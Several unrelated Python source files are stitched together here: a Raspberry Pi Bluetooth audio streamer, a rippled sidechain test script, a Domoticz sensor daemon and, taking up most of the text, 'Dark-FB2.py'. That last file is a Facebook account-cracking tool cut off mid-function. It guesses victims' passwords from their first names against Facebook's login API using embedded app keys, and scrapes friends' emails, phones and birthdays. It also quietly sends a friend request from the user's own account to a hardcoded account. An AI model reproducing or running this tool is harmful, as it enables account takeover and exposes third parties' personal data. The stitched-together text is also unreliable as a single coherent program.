print(ANSI_CYAN + "MIC DEVICE: %s INDEX: %s RATE: %s CH: %s" %
("STL_capture",sd.query_devices().index(sd.query_devices(device="STL_capture")), devF, sd.default.channels[0])+ ANSI_OFF)
if d_out == "alsa_playback":
devIndex= sd.query_devices().index(sd.query_devices(device="default"))
devF= sd.query_devices(device="STL_playback")["default_samplerate"]
print("DEVICE: %s INDEX: %s RATE: %s " % (sd.query_devices(device="default")["name"],devIndex, devF))
sd.default.device=devIndex
stream = sd.RawOutputStream(samplerate=devF)
do_process = True
def audio_player():
global stream
while True:
if len(queue_audio) >= 20:
play= b''.join(queue_audio)
queue_audio.clear()
stream.write(play)
if not do_process:
break
def audio_getter():
global brd
while True:
brd.mAudio.audio_stream(queue_audio)
if not do_process:
break
def signal_handler(signal, frame):
print('You have pressed Ctrl+C!')
call(["mv", "/home/pi/.asoundrc_bkp", "/home/pi/.asoundrc"])
call(["scp", "/etc/asound_bkp.conf", "/etc/asound.conf"])
call(["rm", "/etc/asound_bkp.conf"])
global do_process
do_process = False
def main():
global brd
global stream
global ff
timeout_sc=2
n_dev=-1
# Instantiate the parser
parser = argparse.ArgumentParser(description='BV_Link_rbpi3 application')
# Required positional argument
parser.add_argument('output_config', type=str, help='[alsa_playback] to playback directly to the speaker. [stl_capture] to create a virtual microphone')
parser.add_argument('freq_config', type=int, help='[16000] to set 16KHz frequency.[8000] to set 8KHz frequency')
args = parser.parse_args()
if args.output_config != "alsa_playback" and args.output_config != "stl_capture":
parser.error("output_config required, type -h to get more information")
if args.freq_config != 16000 and args.freq_config != 8000:
parser.error("freq_config required, type -h to get more information")
#scanning phase
sc=scr.ScanPrint()
print (ANSI_RED + "Scanning for devices..." + ANSI_OFF)
try:
hci0=0
scanner = Scanner(hci0).withDelegate(sc).scan(timeout_sc)
except BTLEException:
hci0=1
scanner = Scanner(hci0).withDelegate(sc).scan(timeout_sc)
devices= sc.getListDev()
if len(devices) > 0:
print("Type the index of device to connect (eg. " + str(devices[0].get('index')) +
" for " + devices[0].get('name') + " device)...")
else:
print("no device found")
exit()
try:
n_dev=int(input('Input:'))
except ValueError:
print (" Not a number")
exit()
if (n_dev in range(1,len(devices)+1)) and n_dev > 0:
print("Valid device")
else:
print (" Not valid device")
exit()
#connection
for d in devices:
if d.get('index') == n_dev:
print( 'Connecting to ' + d.get('name') + "...")
brd = stl.Node(d.get('addr'),d.get('type_addr'))
print("Connected")
brd.syncAudio.enable()
brd.syncAudio.enableNotification()
brd.mAudio.enable()
brd.mAudio.setSyncManager(brd.syncAudio)
brd.mAudio.enableNotification()
init_audio(args.output_config, args.freq_config)
getter = Thread(target=audio_getter)
getter.start()
player = Thread(target=audio_player)
player.start()
print( 'Double tap on SensorTile device (for BVLINK1 FW only) to start audio streaming' )
print( 'Push SW2 button on BlueCoin device (for BVLINK1 FW only) to start audio streaming' )
print( 'Device starts fast blinking when it streams. ' )
print('Press Ctrl+C to exit')
stream.start()
signal.signal(signal.SIGINT, signal_handler)
while True:
if not do_process:
break
try:
brd.waitForNotifications(1.0)
except Exception as e:
pass
del brd
if __name__ == "__main__":
try:
main()
except Exception as e:
# do nothing here
print("{}: {}".format(type(e).__name__, e))
|
sidechain_interaction.py
|
#!/usr/bin/env python3
"""
Script to test and debug sidechains.
The mainchain exe location can be set through the command line or
the environment variable RIPPLED_MAINCHAIN_EXE
The sidechain exe location can be set through the command line or
the environment variable RIPPLED_SIDECHAIN_EXE
The configs_dir (generated with create_config_files.py) can be set through the command
line or the environment variable RIPPLED_SIDECHAIN_CFG_DIR
"""
import os
import sys
import time
from multiprocessing import Process, Value
from pathlib import Path
from typing import Any, Callable, List
from slk.chain.chain import Chain
from slk.chain.chain_setup import setup_mainchain, setup_sidechain
from slk.chain.context_managers import (
connect_to_external_chain,
sidechain_network,
single_node_chain,
)
from slk.chain.xchain_transfer import main_to_side_transfer, side_to_main_transfer
from slk.classes.config_file import ConfigFile
from slk.repl import start_repl
from slk.sidechain_params import SidechainParams
from slk.utils.eprint import disable_eprint, eprint
from slk.utils.log_analyzer import convert_log
def _simple_test(mc_chain: Chain, sc_chain: Chain, params: SidechainParams) -> None:
try:
bob = sc_chain.create_account("bob")
main_to_side_transfer(
mc_chain, sc_chain, params.user_account, bob, "200", params
)
main_to_side_transfer(
mc_chain, sc_chain, params.user_account, bob, "60", params
)
if params.with_pauses:
_convert_log_files_to_json(
mc_chain.get_configs() + sc_chain.get_configs(),
"checkpoint1.json",
params.verbose,
)
input("Pausing to check for main -> side txns (press enter to continue)")
side_to_main_transfer(mc_chain, sc_chain, bob, params.user_account, "9", params)
side_to_main_transfer(
mc_chain, sc_chain, bob, params.user_account, "11", params
)
if params.with_pauses:
input("Pausing to check for side -> main txns (press enter to continue)")
finally:
_convert_log_files_to_json(
mc_chain.get_configs() + sc_chain.get_configs(),
"final.json",
params.verbose,
)
def _configs_for_testnet(config_file_prefix: str) -> List[ConfigFile]:
p = Path(config_file_prefix)
folder = p.parent
file_name = p.name
file_names = []
for f in os.listdir(folder):
cfg = os.path.join(folder, f, "rippled.cfg")
if f.startswith(file_name) and os.path.exists(cfg):
file_names.append(cfg)
file_names.sort()
return [ConfigFile(file_name=f) for f in file_names]
def _rm_debug_log(config: ConfigFile, verbose: bool) -> None:
try:
debug_log = config.debug_logfile.get_line()
if debug_log:
if verbose:
print(f"removing debug file: {debug_log}", flush=True)
os.remove(debug_log)
except:
pass
def _standalone_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
# TODO: make more elegant once params is more fleshed out
assert params.mainchain_config is not None
if params.debug_mainchain:
input("Start mainchain server and press enter to continue: ")
else:
_rm_debug_log(params.mainchain_config, params.verbose)
with single_node_chain(
config=params.mainchain_config,
exe=params.mainchain_exe,
run_server=not params.debug_mainchain,
) as mc_chain:
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.debug_sidechain:
input("Start sidechain server and press enter to continue: ")
else:
_rm_debug_log(params.sidechain_config, params.verbose)
with single_node_chain(
config=params.sidechain_config,
exe=params.sidechain_exe,
run_server=not params.debug_sidechain,
) as sc_chain:
setup_sidechain(sc_chain, params, setup_user_accounts)
callback(mc_chain, sc_chain)
def _convert_log_files_to_json(
to_convert: List[ConfigFile], suffix: str, verbose: bool
) -> None:
"""
Convert the log file to json.
Args:
to_convert: A list of config files to convert the debug files of.
suffix: The suffix of the log file.
verbose: Whether to print out extra information.
"""
for c in to_convert:
try:
debug_log = c.debug_logfile.get_line()
assert isinstance(debug_log, str) # for typing
if not os.path.exists(debug_log):
continue
converted_log = f"{debug_log}.{suffix}"
if os.path.exists(converted_log):
os.remove(converted_log)
if verbose:
print(f"Converting log {debug_log} to {converted_log}", flush=True)
convert_log(debug_log, converted_log, pure_json=True)
except:
eprint("Exception converting log")
def _multinode_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
mainchain_cfg = ConfigFile(
file_name=f"{params.configs_dir}/sidechain_testnet/mainchain_0/rippled.cfg"
)
_rm_debug_log(mainchain_cfg, params.verbose)
if params.debug_mainchain:
input("Start mainchain server and press enter to continue: ")
with single_node_chain(
config=mainchain_cfg,
exe=params.mainchain_exe,
run_server=not params.debug_mainchain,
) as mc_chain:
if params.with_pauses:
input("Pausing after mainchain start (press enter to continue)")
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after mainchain setup (press enter to continue)")
testnet_configs = _configs_for_testnet(
f"{params.configs_dir}/sidechain_testnet/sidechain_"
)
for c in testnet_configs:
_rm_debug_log(c, params.verbose)
run_server_list = [True] * len(testnet_configs)
if params.debug_sidechain:
run_server_list[0] = False
input(
f"Start testnet server {testnet_configs[0].get_file_name()} and press "
"enter to continue: "
)
with sidechain_network(
exe=params.sidechain_exe,
configs=testnet_configs,
run_server=run_server_list,
) as sc_chain:
if params.with_pauses:
input("Pausing after testnet start (press enter to continue)")
setup_sidechain(sc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after sidechain setup (press enter to continue)")
callback(mc_chain, sc_chain)
def _external_node_with_callback(
params: SidechainParams,
callback: Callable[[Chain, Chain], None],
setup_user_accounts: bool = True,
) -> None:
assert params.mainnet_port is not None # TODO: type this better
with connect_to_external_chain(
# TODO: stop hardcoding this
url=params.mainnet_url,
port=params.mainnet_port,
) as mc_chain:
setup_mainchain(mc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after mainchain setup (press enter to continue)")
testnet_configs = _configs_for_testnet(
f"{params.configs_dir}/sidechain_testnet/sidechain_"
)
for c in testnet_configs:
_rm_debug_log(c, params.verbose)
run_server_list = [True] * len(testnet_configs)
if params.debug_sidechain:
run_server_list[0] = False
input(
f"Start testnet server {testnet_configs[0].get_file_name()} and press "
"enter to continue: "
)
with sidechain_network(
exe=params.sidechain_exe,
configs=testnet_configs,
run_server=run_server_list,
) as sc_chain:
if params.with_pauses:
input("Pausing after testnet start (press enter to continue)")
setup_sidechain(sc_chain, params, setup_user_accounts)
if params.with_pauses:
input("Pausing after sidechain setup (press enter to continue)")
callback(mc_chain, sc_chain)
def standalone_test(params: SidechainParams) -> None:
"""
Run a mainchain and sidechain in standalone mode and run basic tests on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_standalone_with_callback(params, callback)
def multinode_test(params: SidechainParams) -> None:
"""
Run a mainchain in standalone mode and a multi-node sidechain and run basic tests
on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_multinode_with_callback(params, callback)
def external_node_test(params: SidechainParams) -> None:
"""
Run a connection to an external chainand a multi-node sidechain and run basic tests
on it.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
_simple_test(mc_chain, sc_chain, params)
_external_node_with_callback(params, callback)
def close_mainchain_ledgers(
stop_token: Any, params: SidechainParams, sleep_time: int = 4
) -> None:
"""
The mainchain runs in standalone mode. Most operations - like cross chain payments -
will automatically close ledgers. However, some operations, like refunds, need an
extra close. This loop automatically closes ledgers.
Args:
stop_token: Something to use to know when to stop.
params: The command-line args for running the sidechain.
sleep_time: How long to wait for a ledger close.
"""
assert params.mainchain_config is not None # TODO: type this better
with single_node_chain(
config=params.mainchain_config,
exe=params.mainchain_exe,
run_server=False,
) as mc_chain:
while stop_token.value != 0:
mc_chain.maybe_ledger_accept()
time.sleep(sleep_time)
def standalone_interactive_repl(params: SidechainParams) -> None:
"""
Run a mainchain and sidechain in standalone mode and start up the REPL to interact
with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_standalone_with_callback(params, callback, setup_user_accounts=False)
def multinode_interactive_repl(params: SidechainParams) -> None:
"""
Run a mainchain in standalone mode and a multi-node sidechain and start up the REPL
to interact with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_multinode_with_callback(params, callback, setup_user_accounts=False)
def external_node_interactive_repl(params: SidechainParams) -> None:
"""
Run a connection to an external standalone node, and a multi-node sidechain, and
start up the REPL to interact with them.
Args:
params: The command-line args for running the sidechain.
"""
def callback(mc_chain: Chain, sc_chain: Chain) -> None:
# process will run while stop token is non-zero
stop_token = Value("i", 1)
p = None
if mc_chain.standalone:
p = Process(target=close_mainchain_ledgers, args=(stop_token, params))
p.start()
try:
start_repl(mc_chain, sc_chain)
finally:
if p:
stop_token.value = 0
p.join()
_external_node_with_callback(params, callback, setup_user_accounts=False)
def main() -> None:
"""Initialize the mainchain-sidechain network, with command-line arguments."""
try:
params = SidechainParams()
except Exception as e:
eprint(str(e))
sys.exit(1)
if params.quiet:
print("Disabling eprint")
disable_eprint()
if params.interactive:
if not params.main_standalone:
external_node_interactive_repl(params)
elif params.standalone:
standalone_interactive_repl(params)
else:
multinode_interactive_repl(params)
elif not params.main_standalone:
external_node_test(params)
elif params.standalone:
standalone_test(params)
else:
multinode_test(params)
if __name__ == "__main__":
main()
|
sensors.py
|
#!/usr/bin/python
import sys
import signal
from libs.server import Server
from libs.storage import *
from threading import Thread
from libs.parse_config import Config
from libs.sensor_handling import Sensor
class Main():
def __init__(self):
self.storage = []
self.server = None
self.server_thread = None
def sensor_thread(self, idx):
self.storage[idx].get_sensor().handle_sensor()
def local_server_thread(self):
self.server.run_thread()
def stop(self):
for s in self.storage:
s.get_sensor().stop()
s.get_thread().join()
self.server.stop()
self.server_thread.join()
def start(self):
config = Config()
ret = config.set_config('/etc/domoticz/domoticz.conf')
if ret is False:
print("Wrong config file set")
return -1
count = config.get_sensors_count()
for idx in range(int(count)):
sensor = Sensor(config.get_sensor_name(idx), config)
thread = Thread(target=self.sensor_thread, args=(idx,))
self.storage.append(Storage(thread, sensor))
for s in self.storage:
s.get_thread().start()
self.server = Server(config)
self.server_thread = Thread(target=self.local_server_thread, args=())
self.server_thread.start()
return 0
if __name__ == '__main__':
sensors = Main()
ret = sensors.start()
if ret == -1:
exit(1)
def signal_handler(*args):
print("Your pressed ctrl + c")
sensors.stop()
print("stopped sensors")
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
while True:
signal.pause()
|
Dark-FB2.py
|
# -*- coding: utf-8 -*-
import os, sys, time, datetime, random, hashlib, re, threading, json, getpass, urllib, requests, mechanize
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
else:
try:
import requests
except ImportError:
os.system('pip2 install requests')
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/36.2.2254/119.132; U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print '\x1b[1;91m[!] Tutup'
os.sys.exit()
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.01)
logo = " \x1b[1;92m█████████\n \x1b[1;92m█▄█████▄█ \x1b[1;97m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●\n \x1b[1;92m█ \x1b[1;93m▼▼▼▼▼ \x1b[1;97m- _ --_-- \x1b[1;92m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗ \n \x1b[1;92m█ \x1b[1;97m \x1b[1;97m_-_-- -_ --__ \x1b[1;92m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗\n \x1b[1;92m█ \x1b[1;93m▲▲▲▲▲ \x1b[1;97m-- - _ -- \x1b[1;92m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \x1b[1;93mPremium-Cok\n \x1b[1;92m█████████ \x1b[1;97m«==========✧==========»\n \x1b[1;92m ██ ██\n \x1b[1;97m╔════════════════════════════════════════════════╗\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mReCode \x1b[1;91m: \x1b[1;96m Blu3bi12d Ambon \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mGitHub \x1b[1;91m: \x1b[1;92m \x1b[92mhttps://github.com/blu3bi12d-ambon\x1b[ \x1b[1;97m ║\n \x1b[1;97m║ \x1b[1;93m* \x1b[1;97mFB \x1b[1;91m: \x1b[1;92\x1b[92mhttps://fb.me/blu3bi12d-ambon\x1b[ \x1b[1;97m ║ \n \x1b[1;97m╚════════════════════════════════════════════════╝" '\n\x1b[1;92m[*] Silahkan Login Operamini Agar Tidak Checkpoint\n'
def tik():
titik = [
'. ', '.. ', '... ']
for o in titik:
print '\r\x1b[1;91m[\xe2\x97\x8f] \x1b[1;92mLoading \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idfriends = []
idfromfriends = []
idmem = []
id = []
em = []
emfromfriends = []
hp = []
hpfromfriends = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'
def login():
os.system('clear')
try:
toket = open('login.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x98\x86] \x1b[1;92mMASUK AKUN FACEBOOK \x1b[1;91m[\xe2\x98\x86]'
id = raw_input('\x1b[1;91m[+] \x1b[1;36mUsername \x1b[1;91m:\x1b[1;92m ')
pwd = getpass.getpass('\x1b[1;91m[+] \x1b[1;36mPassword \x1b[1;91m:\x1b[1;92m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + id + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + pwd + 'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': id, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': pwd, 'return_ssl_resources': '0', 'v': '1.0'}
x = hashlib.new('md5')
x.update(sig)
a = x.hexdigest()
data.update({'sig': a})
url = 'https://api.facebook.com/restserver.php'
r = requests.get(url, params=data)
z = json.loads(r.text)
zedd = open('login.txt', 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mLogin success'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token=' + z['access_token'])
time.sleep(1)
menu()
except requests.exceptions.ConnectionError:
print '\n\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
if 'checkpoint' in url:
print '\n\x1b[1;91m[!] \x1b[1;93mAccount Has Been Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
keluar()
else:
print '\n\x1b[1;91m[!] Gagal Masuk'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
def menu():
try:
toket = open('login.txt', 'r').read()
except IOError:
os.system('clear')
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
try:
otw = requests.get('https://graph.facebook.com/me?access_token=' + toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print '\x1b[1;91m[!] \x1b[1;93mSepertinya akun kena Checkpoint'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
except requests.exceptions.ConnectionError:
print logo
print '\x1b[1;91m[!] Tidak Ada Koneksi'
keluar()
os.system('clear')
print logo
print '\x1b[1;97m\xe2\x95\x94' + 50 * '\xe2\x95\x90' + '╗'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Name \x1b[1;91m: \x1b[1;92m' + nama + (39 - len(nama)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m FBID \x1b[1;91m: \x1b[1;92m' + id + (39 - len(id)) * '\x1b[1;97m ' + '║'
print '\xe2\x95\x91\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m]\x1b[1;97m Subs \x1b[1;91m: \x1b[1;92m' + sub + (39 - len(sub)) * '\x1b[1;97m ' + '║'
print '\x1b[1;97m╠' + 50 * '\xe2\x95\x90' + '╝'
print '║-> \x1b[1;37;40m1. User Information'
print '║-> \x1b[1;37;40m2. Hack Facebook Account'
print '║-> \x1b[1;37;40m3. Bot'
print '║-> \x1b[1;37;40m4. Others'
print '║-> \x1b[1;37;40m5. Update'
print '║-> \x1b[1;37;40m6. Logout'
print '║-> \x1b[1;31;40m0. Exit'
print '\x1b[1;37;40m║'
pilih()
def pilih():
zedd = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if zedd == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih()
else:
if zedd == '1':
informasi()
else:
if zedd == '2':
menu_hack()
else:
if zedd == '3':
menu_bot()
else:
if zedd == '4':
lain()
else:
if zedd == '5':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
if zedd == '6':
os.system('rm -rf login.txt')
os.system('xdg-open https://m.facebook.com/rizz.magizz')
keluar()
else:
if zedd == '0':
keluar()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + zedd + ' \x1b[1;91mNot availabel'
pilih()
def informasi():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID\x1b[1;97m/\x1b[1;92mName\x1b[1;91m : \x1b[1;97m')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
cok = json.loads(r.text)
for p in cok['data']:
if id in p['name'] or id in p['id']:
r = requests.get('https://graph.facebook.com/' + p['id'] + '?access_token=' + toket)
z = json.loads(r.text)
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNama\x1b[1;97m : ' + z['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNama\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID\x1b[1;97m : ' + z['id']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mID\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail\x1b[1;97m : ' + z['email']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mEmail\x1b[1;97m : \x1b[1;91mTidak Ada'
else:
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mNomor Telpon\x1b[1;97m : ' + z['mobile_phone']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mNomor Telpon\x1b[1;97m : \x1b[1;91mNot found'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLokasi\x1b[1;97m : ' + z['location']['name']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLokasi\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mLahir\x1b[1;97m : ' + z['birthday']
except KeyError:
print '\x1b[1;91m[?] \x1b[1;92mLahir\x1b[1;97m : \x1b[1;91mTidak Ada'
try:
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mSekolah\x1b[1;97m : '
for q in z['education']:
try:
print '\x1b[1;91m ~ \x1b[1;97m' + q['school']['name']
except KeyError:
print '\x1b[1;91m ~ \x1b[1;91mTidak Ada'
except KeyError:
pass
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] Pengguna Tidak Ada'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
def menu_hack():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Mini Hack Facebook (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m2. Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m3. Super Multi Bruteforce Facebook'
print '║-> \x1b[1;37;40m4. BruteForce (\x1b[1;92mTarget\x1b[1;97m)'
print '║-> \x1b[1;37;40m5. Yahoo Clone'
print '║-> \x1b[1;37;40m6. Ambil ID/Email/HP'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
hack_pilih()
def hack_pilih():
hack = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if hack == '':
print '\x1b[1;91m[!] Can\'t empty'
hack_pilih()
else:
if hack == '1':
mini()
else:
if hack == '2':
crack()
hasil()
else:
if hack == '3':
super()
else:
if hack == '4':
brute()
else:
if hack == '5':
menu_yahoo()
else:
if hack == '6':
grab()
else:
if hack == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + hack + ' \x1b[1;91mNot found'
hack_pilih()
def mini():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[ INFO ] Target must be your friend !'
try:
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
a = json.loads(r.text)
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mName\x1b[1;97m : ' + a['name']
jalan('\x1b[1;91m[+] \x1b[1;92mChecking \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[+] \x1b[1;92mOpen security \x1b[1;97m...')
time.sleep(1)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
pz1 = a['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz1
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
pz2 = a['first_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz2
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
